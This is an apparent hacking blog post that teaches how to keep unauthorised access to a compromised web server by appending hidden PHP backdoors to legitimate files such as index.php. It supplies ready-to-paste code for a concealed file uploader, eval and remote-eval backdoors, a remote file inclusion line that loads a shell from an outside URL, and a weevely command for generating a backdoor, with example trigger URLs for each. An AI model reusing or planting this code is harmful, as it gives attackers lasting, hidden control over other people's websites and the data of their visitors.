Infect web files with malicious php backdoor back connect net cat php uploader bypass backdoor infection how to infect web files with weevely
Keeping access of the web-server even after its patch is good practice and many times your php shell or backdoor could be deleted because of a patch or any other reason.
backdoors |
Today you will learn that HOW YOU CAN INFECT WEB PAGES OR FILES WITH MALICIOUS BACKDOORS to keep you access on the server for a long time.
To make it easy for you because i know everyone is not a coder so i am sharing excat codes which i use to infect php files.
You know about the uploader ? what if you create a hidden uploader ? yes a hidden uploader which comes up after you command the file with your unique address and no one knows that its an uploader inside the file which can be used by simply commanding it.
Get Started
Here below is a hidden uploader php code just copy that code and put that code at the end of the php file where php is ending and after putting that code in a php file at the end save it and open that php file now to use the unloader you will have to command it simply " ?upload=ok " this is the command put this after the php file and unloader will appear at the end.
Hidden Uploader :
<?php if($_GET['upload'] != ""){ if(!isset($_POST['upload'])){ echo '<form enctype="multipart/form-data" method="POST" action=""><br><b>File:</b><input type="file" name="file"> <input type="submit" value="Upload" name="upload"></form>'; } else{ $temporaney = $_FILES['file']['tmp_name']; $upload = $_FILES['file']['name']; if(move_uploaded_file($temporaney,$upload)) echo '<font color="green">File uppato!</font>'; else echo '<font color="red">File non uppato!</font>'; }}?>
This is a hidden uploader malicious code ! Why i say it hidden is that it dont show the uploader till we dont command it .....like if you want to infect any web page example index.php the main page with that uploader then open that file and paste that code at the end of the file source code
example
www.timesofhacking.com/index.php
then you will write www.timesofhacking.com/index.php?upload=ok
Weevely Infection :
Now Infect a web page with a weevely backdoor just generate a php backdoor by typing the command
- weevely generate password
The Same Process with other malicious php codes which are below
RFI Code :
" <?php if($_GET['rfi'] != "") include($_GET['rfi']); ?> "
then after that open the file
and write " www.timesofhacing.com/index.php?rfi=http://www.your_remote_shell_link.com/shell.php "
Eval Code :
" <?php if($_GET['eval'] != "") eval($_GET['eval']); ?> "
The Same thing copy paste the malicious code and paste it at the end of the file which you want to infect and after that open file and command it as " www.timesofhacing.com/index.php?eval=your_eval_code_here " after the file
Remote Eval Code :
" <?php if($_GET['remoteeval'] != "") eval(file_get_contents($_GET['remoteeval'])); ?> "
This is for remote eval so after writing this code at the end of the file
write "www.timesofhacking.com/index.php?remoteeval=[LINK CODE] "
Posting Komentar